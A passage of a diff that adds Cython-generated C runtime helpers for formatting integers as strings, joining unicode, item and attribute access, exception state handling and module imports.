= end - dpos; + ulength = length; + prepend_sign = 0; + if (!is_unsigned && value <= neg_one) { + if (padding_char == ' ' || width <= length + 1) { + *(--dpos) = '-'; + ++length; + } else { + prepend_sign = 1; + } + ++ulength; + } + if (width > ulength) { + ulength = width; + } + if (ulength == 1) { + return PyUnicode_FromOrdinal(*dpos); + } + return __Pyx_PyUnicode_BuildFromAscii(ulength, dpos, (int) length, prepend_sign, padding_char); +} + +/* CIntToPyUnicode */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_From_Py_ssize_t(Py_ssize_t value, Py_ssize_t width, char padding_char, char format_char) { + char digits[sizeof(Py_ssize_t)*3+2]; + char *dpos, *end = digits + sizeof(Py_ssize_t)*3+2; + const char *hex_digits = DIGITS_HEX; + Py_ssize_t length, ulength; + int prepend_sign, last_one_off; + Py_ssize_t remaining; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const Py_ssize_t neg_one = (Py_ssize_t) -1, const_zero = (Py_ssize_t) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (format_char == 'X') { + hex_digits += 16; + format_char = 'x'; + } + remaining = value; + last_one_off = 0; + dpos = end; + do { + int digit_pos; + switch (format_char) { + case 'o': + digit_pos = abs((int)(remaining % (8*8))); + remaining = (Py_ssize_t) (remaining / (8*8)); + dpos -= 2; + memcpy(dpos, DIGIT_PAIRS_8 + digit_pos * 2, 2); + last_one_off = (digit_pos < 8); + break; + case 'd': + digit_pos = abs((int)(remaining % (10*10))); + remaining = (Py_ssize_t) (remaining / (10*10)); + dpos -= 2; + memcpy(dpos, DIGIT_PAIRS_10 + digit_pos * 2, 2); + last_one_off = (digit_pos < 10); + break; + case 'x': + *(--dpos) = hex_digits[abs((int)(remaining % 16))]; + remaining = (Py_ssize_t) (remaining / 16); + break; + default: + assert(0); + break; + } + } while (unlikely(remaining != 0)); + assert(!last_one_off || *dpos == '0'); + dpos += last_one_off; + length = end - dpos; + ulength = length; + prepend_sign = 0; + if (!is_unsigned && value <= neg_one) { + if (padding_char == ' ' || width <= length + 1) { + *(--dpos) = '-'; + ++length; + } else { + prepend_sign = 1; + } + ++ulength; + } + if (width > ulength) { + ulength = width; + } + if (ulength == 1) { + return PyUnicode_FromOrdinal(*dpos); + } + return __Pyx_PyUnicode_BuildFromAscii(ulength, dpos, (int) length, prepend_sign, padding_char); +} + +/* JoinPyUnicode */ +static PyObject* __Pyx_PyUnicode_Join(PyObject* value_tuple, Py_ssize_t value_count, Py_ssize_t result_ulength, + Py_UCS4 max_char) { +#if CYTHON_USE_UNICODE_INTERNALS && CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + PyObject *result_uval; + int result_ukind, kind_shift; + Py_ssize_t i, char_pos; + void *result_udata; + CYTHON_MAYBE_UNUSED_VAR(max_char); +#if CYTHON_PEP393_ENABLED + result_uval = PyUnicode_New(result_ulength, max_char); + if (unlikely(!result_uval)) return NULL; + result_ukind = (max_char <= 255) ? PyUnicode_1BYTE_KIND : (max_char <= 65535) ? PyUnicode_2BYTE_KIND : PyUnicode_4BYTE_KIND; + kind_shift = (result_ukind == PyUnicode_4BYTE_KIND) ? 2 : result_ukind - 1; + result_udata = PyUnicode_DATA(result_uval); +#else + result_uval = PyUnicode_FromUnicode(NULL, result_ulength); + if (unlikely(!result_uval)) return NULL; + result_ukind = sizeof(Py_UNICODE); + kind_shift = (result_ukind == 4) ? 2 : result_ukind - 1; + result_udata = PyUnicode_AS_UNICODE(result_uval); +#endif + assert(kind_shift == 2 || kind_shift == 1 || kind_shift == 0); + char_pos = 0; + for (i=0; i < value_count; i++) { + int ukind; + Py_ssize_t ulength; + void *udata; + PyObject *uval = PyTuple_GET_ITEM(value_tuple, i); + if (unlikely(__Pyx_PyUnicode_READY(uval))) + goto bad; + ulength = __Pyx_PyUnicode_GET_LENGTH(uval); + if (unlikely(!ulength)) + continue; + if (unlikely((PY_SSIZE_T_MAX >> kind_shift) - ulength < char_pos)) + goto overflow; + ukind = __Pyx_PyUnicode_KIND(uval); + udata = __Pyx_PyUnicode_DATA(uval); + if (!CYTHON_PEP393_ENABLED || ukind == result_ukind) { + memcpy((char *)result_udata + (char_pos << kind_shift), udata, (size_t) (ulength << kind_shift)); + } else { + #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030300F0 || defined(_PyUnicode_FastCopyCharacters) + _PyUnicode_FastCopyCharacters(result_uval, char_pos, uval, 0, ulength); + #else + Py_ssize_t j; + for (j=0; j < ulength; j++) { + Py_UCS4 uchar = __Pyx_PyUnicode_READ(ukind, udata, j); + __Pyx_PyUnicode_WRITE(result_ukind, result_udata, char_pos+j, uchar); + } + #endif + } + char_pos += ulength; + } + return result_uval; +overflow: + PyErr_SetString(PyExc_OverflowError, "join() result is too long for a Python string"); +bad: + Py_DECREF(result_uval); + return NULL; +#else + CYTHON_UNUSED_VAR(max_char); + CYTHON_UNUSED_VAR(result_ulength); + CYTHON_UNUSED_VAR(value_count); + return PyUnicode_Join(__pyx_empty_unicode, value_tuple); +#endif +} + +/* GetAttr */ +static CYTHON_INLINE PyObject *__Pyx_GetAttr(PyObject *o, PyObject *n) { +#if CYTHON_USE_TYPE_SLOTS +#if PY_MAJOR_VERSION >= 3 + if (likely(PyUnicode_Check(n))) +#else + if (likely(PyString_Check(n))) +#endif + return __Pyx_PyObject_GetAttrStr(o, n); +#endif + return PyObject_GetAttr(o, n); +} + +/* GetItemInt */ +static PyObject *__Pyx_GetItemInt_Generic(PyObject *o, PyObject* j) { + PyObject *r; + if (unlikely(!j)) return NULL; + r = PyObject_GetItem(o, j); + Py_DECREF(j); + return r; +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_List_Fast(PyObject *o, Py_ssize_t i, + CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + Py_ssize_t wrapped_i = i; + if (wraparound & unlikely(i < 0)) { + wrapped_i += PyList_GET_SIZE(o); + } + if ((!boundscheck) || likely(__Pyx_is_valid_index(wrapped_i, PyList_GET_SIZE(o)))) { + PyObject *r = PyList_GET_ITEM(o, wrapped_i); + Py_INCREF(r); + return r; + } + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +#else + return PySequence_GetItem(o, i); +#endif +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Tuple_Fast(PyObject *o, Py_ssize_t i, + CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + Py_ssize_t wrapped_i = i; + if (wraparound & unlikely(i < 0)) { + wrapped_i += PyTuple_GET_SIZE(o); + } + if ((!boundscheck) || likely(__Pyx_is_valid_index(wrapped_i, PyTuple_GET_SIZE(o)))) { + PyObject *r = PyTuple_GET_ITEM(o, wrapped_i); + Py_INCREF(r); + return r; + } + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +#else + return PySequence_GetItem(o, i); +#endif +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Fast(PyObject *o, Py_ssize_t i, int is_list, + CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS && CYTHON_USE_TYPE_SLOTS + if (is_list || PyList_CheckExact(o)) { + Py_ssize_t n = ((!wraparound) | likely(i >= 0)) ? i : i + PyList_GET_SIZE(o); + if ((!boundscheck) || (likely(__Pyx_is_valid_index(n, PyList_GET_SIZE(o))))) { + PyObject *r = PyList_GET_ITEM(o, n); + Py_INCREF(r); + return r; + } + } + else if (PyTuple_CheckExact(o)) { + Py_ssize_t n = ((!wraparound) | likely(i >= 0)) ? i : i + PyTuple_GET_SIZE(o); + if ((!boundscheck) || likely(__Pyx_is_valid_index(n, PyTuple_GET_SIZE(o)))) { + PyObject *r = PyTuple_GET_ITEM(o, n); + Py_INCREF(r); + return r; + } + } else { + PyMappingMethods *mm = Py_TYPE(o)->tp_as_mapping; + PySequenceMethods *sm = Py_TYPE(o)->tp_as_sequence; + if (mm && mm->mp_subscript) { + PyObject *r, *key = PyInt_FromSsize_t(i); + if (unlikely(!key)) return NULL; + r = mm->mp_subscript(o, key); + Py_DECREF(key); + return r; + } + if (likely(sm && sm->sq_item)) { + if (wraparound && unlikely(i < 0) && likely(sm->sq_length)) { + Py_ssize_t l = sm->sq_length(o); + if (likely(l >= 0)) { + i += l; + } else { + if (!PyErr_ExceptionMatches(PyExc_OverflowError)) + return NULL; + PyErr_Clear(); + } + } + return sm->sq_item(o, i); + } + } +#else + if (is_list || PySequence_Check(o)) { + return PySequence_GetItem(o, i); + } +#endif + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +} + +/* PyObjectCallOneArg */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallOneArg(PyObject *func, PyObject *arg) { + PyObject *args[2] = {NULL, arg}; + return __Pyx_PyObject_FastCall(func, args+1, 1 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); +} + +/* ObjectGetItem */ +#if CYTHON_USE_TYPE_SLOTS +static PyObject *__Pyx_PyObject_GetIndex(PyObject *obj, PyObject *index) { + PyObject *runerr = NULL; + Py_ssize_t key_value; + key_value = __Pyx_PyIndex_AsSsize_t(index); + if (likely(key_value != -1 || !(runerr = PyErr_Occurred()))) { + return __Pyx_GetItemInt_Fast(obj, key_value, 0, 1, 1); + } + if (PyErr_GivenExceptionMatches(runerr, PyExc_OverflowError)) { + __Pyx_TypeName index_type_name = __Pyx_PyType_GetName(Py_TYPE(index)); + PyErr_Clear(); + PyErr_Format(PyExc_IndexError, + "cannot fit '" __Pyx_FMT_TYPENAME "' into an index-sized integer", index_type_name); + __Pyx_DECREF_TypeName(index_type_name); + } + return NULL; +} +static PyObject *__Pyx_PyObject_GetItem_Slow(PyObject *obj, PyObject *key) { + __Pyx_TypeName obj_type_name; + if (likely(PyType_Check(obj))) { + PyObject *meth = __Pyx_PyObject_GetAttrStrNoError(obj, __pyx_n_s_class_getitem); + if (meth) { + PyObject *result = __Pyx_PyObject_CallOneArg(meth, key); + Py_DECREF(meth); + return result; + } + } + obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + PyErr_Format(PyExc_TypeError, + "'" __Pyx_FMT_TYPENAME "' object is not subscriptable", obj_type_name); + __Pyx_DECREF_TypeName(obj_type_name); + return NULL; +} +static PyObject *__Pyx_PyObject_GetItem(PyObject *obj, PyObject *key) { + PyTypeObject *tp = Py_TYPE(obj); + PyMappingMethods *mm = tp->tp_as_mapping; + PySequenceMethods *sm = tp->tp_as_sequence; + if (likely(mm && mm->mp_subscript)) { + return mm->mp_subscript(obj, key); + } + if (likely(sm && sm->sq_item)) { + return __Pyx_PyObject_GetIndex(obj, key); + } + return __Pyx_PyObject_GetItem_Slow(obj, key); +} +#endif + +/* KeywordStringCheck */ +static int __Pyx_CheckKeywordStrings( + PyObject *kw, + const char* function_name, + int kw_allowed) +{ + PyObject* key = 0; + Py_ssize_t pos = 0; +#if CYTHON_COMPILING_IN_PYPY + if (!kw_allowed && PyDict_Next(kw, &pos, &key, 0)) + goto invalid_keyword; + return 1; +#else + if (CYTHON_METH_FASTCALL && likely(PyTuple_Check(kw))) { + if (unlikely(PyTuple_GET_SIZE(kw) == 0)) + return 1; + if (!kw_allowed) { + key = PyTuple_GET_ITEM(kw, 0); + goto invalid_keyword; + } +#if PY_VERSION_HEX < 0x03090000 + for (pos = 0; pos < PyTuple_GET_SIZE(kw); pos++) { + key = PyTuple_GET_ITEM(kw, pos); + if (unlikely(!PyUnicode_Check(key))) + goto invalid_keyword_type; + } +#endif + return 1; + } + while (PyDict_Next(kw, &pos, &key, 0)) { + #if PY_MAJOR_VERSION < 3 + if (unlikely(!PyString_Check(key))) + #endif + if (unlikely(!PyUnicode_Check(key))) + goto invalid_keyword_type; + } + if (!kw_allowed && unlikely(key)) + goto invalid_keyword; + return 1; +invalid_keyword_type: + PyErr_Format(PyExc_TypeError, + "%.200s() keywords must be strings", function_name); + return 0; +#endif +invalid_keyword: + #if PY_MAJOR_VERSION < 3 + PyErr_Format(PyExc_TypeError, + "%.200s() got an unexpected keyword argument '%.200s'", + function_name, PyString_AsString(key)); + #else + PyErr_Format(PyExc_TypeError, + "%s() got an unexpected keyword argument '%U'", + function_name, key); + #endif + return 0; +} + +/* DivInt[Py_ssize_t] */ +static CYTHON_INLINE Py_ssize_t __Pyx_div_Py_ssize_t(Py_ssize_t a, Py_ssize_t b) { + Py_ssize_t q = a / b; + Py_ssize_t r = a - q*b; + q -= ((r != 0) & ((r ^ b) < 0)); + return q; +} + +/* GetAttr3 */ +static PyObject *__Pyx_GetAttr3Default(PyObject *d) { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + if (unlikely(!__Pyx_PyErr_ExceptionMatches(PyExc_AttributeError))) + return NULL; + __Pyx_PyErr_Clear(); + Py_INCREF(d); + return d; +} +static CYTHON_INLINE PyObject *__Pyx_GetAttr3(PyObject *o, PyObject *n, PyObject *d) { + PyObject *r; +#if CYTHON_USE_TYPE_SLOTS + if (likely(PyString_Check(n))) { + r = __Pyx_PyObject_GetAttrStrNoError(o, n); + if (unlikely(!r) && likely(!PyErr_Occurred())) { + r = __Pyx_NewRef(d); + } + return r; + } +#endif + r = PyObject_GetAttr(o, n); + return (likely(r)) ? r : __Pyx_GetAttr3Default(d); +} + +/* PyDictVersioning */ +#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj) { + PyObject *dict = Py_TYPE(obj)->tp_dict; + return likely(dict) ? __PYX_GET_DICT_VERSION(dict) : 0; +} +static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj) { + PyObject **dictptr = NULL; + Py_ssize_t offset = Py_TYPE(obj)->tp_dictoffset; + if (offset) { +#if CYTHON_COMPILING_IN_CPYTHON + dictptr = (likely(offset > 0)) ? (PyObject **) ((char *)obj + offset) : _PyObject_GetDictPtr(obj); +#else + dictptr = _PyObject_GetDictPtr(obj); +#endif + } + return (dictptr && *dictptr) ? __PYX_GET_DICT_VERSION(*dictptr) : 0; +} +static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version) { + PyObject *dict = Py_TYPE(obj)->tp_dict; + if (unlikely(!dict) || unlikely(tp_dict_version != __PYX_GET_DICT_VERSION(dict))) + return 0; + return obj_dict_version == __Pyx_get_object_dict_version(obj); +} +#endif + +/* GetModuleGlobalName */ +#if CYTHON_USE_DICT_VERSIONS +static PyObject *__Pyx__GetModuleGlobalName(PyObject *name, PY_UINT64_T *dict_version, PyObject **dict_cached_value) +#else +static CYTHON_INLINE PyObject *__Pyx__GetModuleGlobalName(PyObject *name) +#endif +{ + PyObject *result; +#if !CYTHON_AVOID_BORROWED_REFS +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030500A1 + result = _PyDict_GetItem_KnownHash(__pyx_d, name, ((PyASCIIObject *) name)->hash); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } else if (unlikely(PyErr_Occurred())) { + return NULL; + } +#elif CYTHON_COMPILING_IN_LIMITED_API + if (unlikely(!__pyx_m)) { + return NULL; + } + result = PyObject_GetAttr(__pyx_m, name); + if (likely(result)) { + return result; + } +#else + result = PyDict_GetItem(__pyx_d, name); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } +#endif +#else + result = PyObject_GetItem(__pyx_d, name); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } + PyErr_Clear(); +#endif + return __Pyx_GetBuiltinName(name); +} + +/* RaiseTooManyValuesToUnpack */ +static CYTHON_INLINE void __Pyx_RaiseTooManyValuesError(Py_ssize_t expected) { + PyErr_Format(PyExc_ValueError, + "too many values to unpack (expected %" CYTHON_FORMAT_SSIZE_T "d)", expected); +} + +/* RaiseNeedMoreValuesToUnpack */ +static CYTHON_INLINE void __Pyx_RaiseNeedMoreValuesError(Py_ssize_t index) { + PyErr_Format(PyExc_ValueError, + "need more than %" CYTHON_FORMAT_SSIZE_T "d value%.1s to unpack", + index, (index == 1) ? "" : "s"); +} + +/* RaiseNoneIterError */ +static CYTHON_INLINE void __Pyx_RaiseNoneNotIterableError(void) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not iterable"); +} + +/* ExtTypeTest */ +static CYTHON_INLINE int __Pyx_TypeTest(PyObject *obj, PyTypeObject *type) { + __Pyx_TypeName obj_type_name; + __Pyx_TypeName type_name; + if (unlikely(!type)) { + PyErr_SetString(PyExc_SystemError, "Missing type object"); + return 0; + } + if (likely(__Pyx_TypeCheck(obj, type))) + return 1; + obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + type_name = __Pyx_PyType_GetName(type); + PyErr_Format(PyExc_TypeError, + "Cannot convert " __Pyx_FMT_TYPENAME " to " __Pyx_FMT_TYPENAME, + obj_type_name, type_name); + __Pyx_DECREF_TypeName(obj_type_name); + __Pyx_DECREF_TypeName(type_name); + return 0; +} + +/* GetTopmostException */ +#if CYTHON_USE_EXC_INFO_STACK && CYTHON_FAST_THREAD_STATE +static _PyErr_StackItem * +__Pyx_PyErr_GetTopmostException(PyThreadState *tstate) +{ + _PyErr_StackItem *exc_info = tstate->exc_info; + while ((exc_info->exc_value == NULL || exc_info->exc_value == Py_None) && + exc_info->previous_item != NULL) + { + exc_info = exc_info->previous_item; + } + return exc_info; +} +#endif + +/* SaveResetException */ +#if CYTHON_FAST_THREAD_STATE +static CYTHON_INLINE void __Pyx__ExceptionSave(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { + #if CYTHON_USE_EXC_INFO_STACK && PY_VERSION_HEX >= 0x030B00a4 + _PyErr_StackItem *exc_info = __Pyx_PyErr_GetTopmostException(tstate); + PyObject *exc_value = exc_info->exc_value; + if (exc_value == NULL || exc_value == Py_None) { + *value = NULL; + *type = NULL; + *tb = NULL; + } else { + *value = exc_value; + Py_INCREF(*value); + *type = (PyObject*) Py_TYPE(exc_value); + Py_INCREF(*type); + *tb = PyException_GetTraceback(exc_value); + } + #elif CYTHON_USE_EXC_INFO_STACK + _PyErr_StackItem *exc_info = __Pyx_PyErr_GetTopmostException(tstate); + *type = exc_info->exc_type; + *value = exc_info->exc_value; + *tb = exc_info->exc_traceback; + Py_XINCREF(*type); + Py_XINCREF(*value); + Py_XINCREF(*tb); + #else + *type = tstate->exc_type; + *value = tstate->exc_value; + *tb = tstate->exc_traceback; + Py_XINCREF(*type); + Py_XINCREF(*value); + Py_XINCREF(*tb); + #endif +} +static CYTHON_INLINE void __Pyx__ExceptionReset(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb) { + #if CYTHON_USE_EXC_INFO_STACK && PY_VERSION_HEX >= 0x030B00a4 + _PyErr_StackItem *exc_info = tstate->exc_info; + PyObject *tmp_value = exc_info->exc_value; + exc_info->exc_value = value; + Py_XDECREF(tmp_value); + Py_XDECREF(type); + Py_XDECREF(tb); + #else + PyObject *tmp_type, *tmp_value, *tmp_tb; + #if CYTHON_USE_EXC_INFO_STACK + _PyErr_StackItem *exc_info = tstate->exc_info; + tmp_type = exc_info->exc_type; + tmp_value = exc_info->exc_value; + tmp_tb = exc_info->exc_traceback; + exc_info->exc_type = type; + exc_info->exc_value = value; + exc_info->exc_traceback = tb; + #else + tmp_type = tstate->exc_type; + tmp_value = tstate->exc_value; + tmp_tb = tstate->exc_traceback; + tstate->exc_type = type; + tstate->exc_value = value; + tstate->exc_traceback = tb; + #endif + Py_XDECREF(tmp_type); + Py_XDECREF(tmp_value); + Py_XDECREF(tmp_tb); + #endif +} +#endif + +/* GetException */ +#if CYTHON_FAST_THREAD_STATE +static int __Pyx__GetException(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) +#else +static int __Pyx_GetException(PyObject **type, PyObject **value, PyObject **tb) +#endif +{ + PyObject *local_type = NULL, *local_value, *local_tb = NULL; +#if CYTHON_FAST_THREAD_STATE + PyObject *tmp_type, *tmp_value, *tmp_tb; + #if PY_VERSION_HEX >= 0x030C00A6 + local_value = tstate->current_exception; + tstate->current_exception = 0; + if (likely(local_value)) { + local_type = (PyObject*) Py_TYPE(local_value); + Py_INCREF(local_type); + local_tb = PyException_GetTraceback(local_value); + } + #else + local_type = tstate->curexc_type; + local_value = tstate->curexc_value; + local_tb = tstate->curexc_traceback; + tstate->curexc_type = 0; + tstate->curexc_value = 0; + tstate->curexc_traceback = 0; + #endif +#else + PyErr_Fetch(&local_type, &local_value, &local_tb); +#endif + PyErr_NormalizeException(&local_type, &local_value, &local_tb); +#if CYTHON_FAST_THREAD_STATE && PY_VERSION_HEX >= 0x030C00A6 + if (unlikely(tstate->current_exception)) +#elif CYTHON_FAST_THREAD_STATE + if (unlikely(tstate->curexc_type)) +#else + if (unlikely(PyErr_Occurred())) +#endif + goto bad; + #if PY_MAJOR_VERSION >= 3 + if (local_tb) { + if (unlikely(PyException_SetTraceback(local_value, local_tb) < 0)) + goto bad; + } + #endif + Py_XINCREF(local_tb); + Py_XINCREF(local_type); + Py_XINCREF(local_value); + *type = local_type; + *value = local_value; + *tb = local_tb; +#if CYTHON_FAST_THREAD_STATE + #if CYTHON_USE_EXC_INFO_STACK + { + _PyErr_StackItem *exc_info = tstate->exc_info; + #if PY_VERSION_HEX >= 0x030B00a4 + tmp_value = exc_info->exc_value; + exc_info->exc_value = local_value; + tmp_type = NULL; + tmp_tb = NULL; + Py_XDECREF(local_type); + Py_XDECREF(local_tb); + #else + tmp_type = exc_info->exc_type; + tmp_value = exc_info->exc_value; + tmp_tb = exc_info->exc_traceback; + exc_info->exc_type = local_type; + exc_info->exc_value = local_value; + exc_info->exc_traceback = local_tb; + #endif + } + #else + tmp_type = tstate->exc_type; + tmp_value = tstate->exc_value; + tmp_tb = tstate->exc_traceback; + tstate->exc_type = local_type; + tstate->exc_value = local_value; + tstate->exc_traceback = local_tb; + #endif + Py_XDECREF(tmp_type); + Py_XDECREF(tmp_value); + Py_XDECREF(tmp_tb); +#else + PyErr_SetExcInfo(local_type, local_value, local_tb); +#endif + return 0; +bad: + *type = 0; + *value = 0; + *tb = 0; + Py_XDECREF(local_type); + Py_XDECREF(local_value); + Py_XDECREF(local_tb); + return -1; +} + +/* SwapException */ +#if CYTHON_FAST_THREAD_STATE +static CYTHON_INLINE void __Pyx__ExceptionSwap(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { + PyObject *tmp_type, *tmp_value, *tmp_tb; + #if CYTHON_USE_EXC_INFO_STACK && PY_VERSION_HEX >= 0x030B00a4 + _PyErr_StackItem *exc_info = tstate->exc_info; + tmp_value = exc_info->exc_value; + exc_info->exc_value = *value; + if (tmp_value == NULL || tmp_value == Py_None) { + Py_XDECREF(tmp_value); + tmp_value = NULL; + tmp_type = NULL; + tmp_tb = NULL; + } else { + tmp_type = (PyObject*) Py_TYPE(tmp_value); + Py_INCREF(tmp_type); + #if CYTHON_COMPILING_IN_CPYTHON + tmp_tb = ((PyBaseExceptionObject*) tmp_value)->traceback; + Py_XINCREF(tmp_tb); + #else + tmp_tb = PyException_GetTraceback(tmp_value); + #endif + } + #elif CYTHON_USE_EXC_INFO_STACK + _PyErr_StackItem *exc_info = tstate->exc_info; + tmp_type = exc_info->exc_type; + tmp_value = exc_info->exc_value; + tmp_tb = exc_info->exc_traceback; + exc_info->exc_type = *type; + exc_info->exc_value = *value; + exc_info->exc_traceback = *tb; + #else + tmp_type = tstate->exc_type; + tmp_value = tstate->exc_value; + tmp_tb = tstate->exc_traceback; + tstate->exc_type = *type; + tstate->exc_value = *value; + tstate->exc_traceback = *tb; + #endif + *type = tmp_type; + *value = tmp_value; + *tb = tmp_tb; +} +#else +static CYTHON_INLINE void __Pyx_ExceptionSwap(PyObject **type, PyObject **value, PyObject **tb) { + PyObject *tmp_type, *tmp_value, *tmp_tb; + PyErr_GetExcInfo(&tmp_type, &tmp_value, &tmp_tb); + PyErr_SetExcInfo(*type, *value, *tb); + *type = tmp_type; + *value = tmp_value; + *tb = tmp_tb; +} +#endif + +/* Import */ +static PyObject *__Pyx_Import(PyObject *name, PyObject *from_list, int level) { + PyObject *module = 0; + PyObject *empty_dict = 0; + PyObject *empty_list = 0; + #if PY_MAJOR_VERSION < 3 + PyObject *py_import; + py_import = __Pyx_PyObject_GetAttrStr(__pyx_b, __pyx_n_s_import); + if (unlikely(!py_import)) + goto bad; + if (!from_list) { + empty_list = PyList_New(0); + if (unlikely(!empty_list)) + goto bad; + from_list = empty_list; + } + #endif + empty_dict = PyDict_New(); + if (unlikely(!empty_dict)) + goto bad; + { + #if PY_MAJOR_VERSION >= 3 + if (level == -1) { + if ((1) && (strchr(__Pyx_MODULE_NAME, '.'))) { + #if CYTHON_COMPILING_IN_LIMITED_API + module = PyImport_ImportModuleLevelObject( + name, empty_dict, empty_dict, from_list, 1); + #else + module = PyImport_ImportModuleLevelObject( + name, __pyx_d, empty_dict, from_list, 1); + #endif + if (unlikely(!module)) { + if (unlikely(!PyErr_ExceptionMatches(PyExc_ImportError))) + goto bad; + PyErr_Clear(); + } + } + level = 0; + } + #endif + if (!module) { + #if PY_MAJOR_VERSION < 3 + PyObject *py_level = PyInt_FromLong(level); + if (unlikely(!py_level)) + goto bad; + module = PyObject_CallFunctionObjArgs(py_import, + name, __pyx_d, empty_dict, from_list, py_level, (PyObject *)NULL); + Py_DECREF(py_level); + #else + #if CYTHON_COMPILING_IN_LIMITED_API + module = PyImport_ImportModuleLevelObject( + name, empty_dict, empty_dict, from_list, level); + #else + module = PyImport_ImportModuleLevelObject( + name, __pyx_d, empty_dict, from_list, level); + #endif + #endif + } + } +bad: + Py_XDECREF(empty_dict); + Py_XDECREF(empty_list); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(py_import); + #endif + return module; +} + +/* ImportDottedModule */ +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx__ImportDottedModule_Error(PyObject *name, PyObject *parts_tuple, Py_ssize_t count) { + PyObject *partial_name = NULL, *slice = NULL, *sep = NULL; + if (unlikely(PyErr_Occurred())) { + PyErr_Clear(); + } + if (likely(PyTuple_GET_SIZE(parts_tuple) == count)) { + partial_name = name; + } else { + slice = PySequence_GetSlice(parts_tuple, 0, count); + if (unlikely(!slice)) + goto bad; + sep = PyUnicode_FromStringAndSize(".", 1); + if (unlikely(!sep)) + goto bad; + partial_name = PyUnicode_Join(sep, slice); + } + PyErr_Format( +#if PY_MAJOR_VERSION < 3 + PyExc_ImportError, + "No module named '%s'", PyString_AS_STRING(partial_name)); +#else +#if PY_VERSION_HEX >= 0x030600B1 + PyExc_ModuleNotFoundError, +#else + PyExc_ImportError, +#endif + "No module named '%U'", partial_name); +#endif +bad: + Py_XDECREF(sep); + Py_XDECREF(slice); + Py_XDECREF(partial_name); + return NULL; +} +#endif +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx__ImportDottedModule_Lookup(PyObject *name) { + PyObject *imported_module; +#if PY_VERSION_HEX < 0x030700A1 || (CYTHON_COMPILING_IN_PYPY && PYPY_VERSION_NUM < 0x07030400) + PyObject *modules = PyImport_GetModuleDict(); + if (unlikely(!modules)) + return NULL; + imported_module = __Pyx_PyDict_GetItemStr(modules, name); + Py_XINCREF(imported_module); +#else + imported_module = PyImport_GetModule(name); +#endif + return imported_module; +} +#endif +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_ImportDottedModule_WalkParts(PyObject *module, PyObject *name, PyObject *parts_tuple) { + Py_ssize_t i, nparts; + nparts = PyTuple_GET_SIZE(parts_tuple); + for (i=1; i < nparts && module; i++) { + PyObject *part, *submodule; +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + part = PyTuple_GET_ITEM(parts_tuple, i); +#else + part = PySequence_ITEM(parts_tuple, i); +#endif + submodule = __Pyx_PyObject_GetAttrStrNoError(module, part); +#if !(CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS) + Py_DECREF(part); +#endif + Py_DECREF(module); + module = submodule; + } + if (unlikely(!module)) { + return __Pyx__ImportDottedModule_Error(name, parts_tuple, i); + } + return module; +} +#endif +static PyObject *__Pyx__ImportDottedModule(PyObject *name, PyObject *parts_tuple) { +#if PY_MAJOR_VERSION < 3 + PyObject *module, *from_list, *star = __pyx_n_s__3; + CYTHON_UNUSED_VAR(parts_tuple); + from_list = PyList_New(1); + if (unlikely(!from_list)) + return NULL; + Py_INCREF(star); + PyList_SET_ITEM(from_list, 0, star); + module = __Pyx_Import(name, from_list, 0); + Py_DECREF(from_list); + return module; +#else + PyObject *imported_module; + PyObject *module = __Pyx_Import(name, NULL, 0); + if (!parts_tuple || unlikely(!module)) + return module; + imported_module = __Pyx__ImportDottedModule_Lookup(name); + if (likely(imported_module)) { + Py_DECREF(module); + return imported_module; + } + PyErr_Clear(); + return __Pyx_ImportDottedModule_WalkParts(module, name, parts_tuple); +#endif 